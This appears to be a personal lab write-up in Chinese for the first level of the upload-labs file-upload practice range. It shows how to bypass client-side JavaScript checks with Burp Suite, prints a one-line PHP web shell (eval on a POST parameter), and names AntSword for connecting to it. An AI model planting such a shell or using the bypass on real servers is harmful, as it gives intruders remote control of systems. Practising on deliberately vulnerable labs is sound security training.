文件管理第一关
文件上传靶场练习:
一,安装文件上传靶场:upload labs
先下载phpstudy 打开,版本设置为5.2.17
下载靶场文件,访问 http://localhost/upload-labs/
第一关上传weshell到服务器,weshell是一种网页后门,是入侵者通过网络端口对服务器进行操作的权限,大多以动态脚本的形式出现,可以理解为网页后门。
题目让上传图片文件,但是还要上传weshell,可以通过抓包来修改图片文件的格式。在之前作题的时候保存了一个一句话木马,可以把他改成png后缀来上传,利用的原理是burp绕过js验证。
除此之外我还发现burp可以直接移除网页的js验证
使用方法就是先打开移除选项,然后重新刷新第一关的网址,就可以直接上传php文件了。
php代码:
<?php eval($_POST['liuzhuang']); //谁是大恶人 那必定是我liuzhuang //当你的服务器看到 0xliuzhuang 就知道要买台新机器了 ?>上传之后,可以用蚁剑来打开后门。最好不要用菜刀,现在菜刀好像有很多都有后门 病毒。
蚁剑通过路径就可以访问了。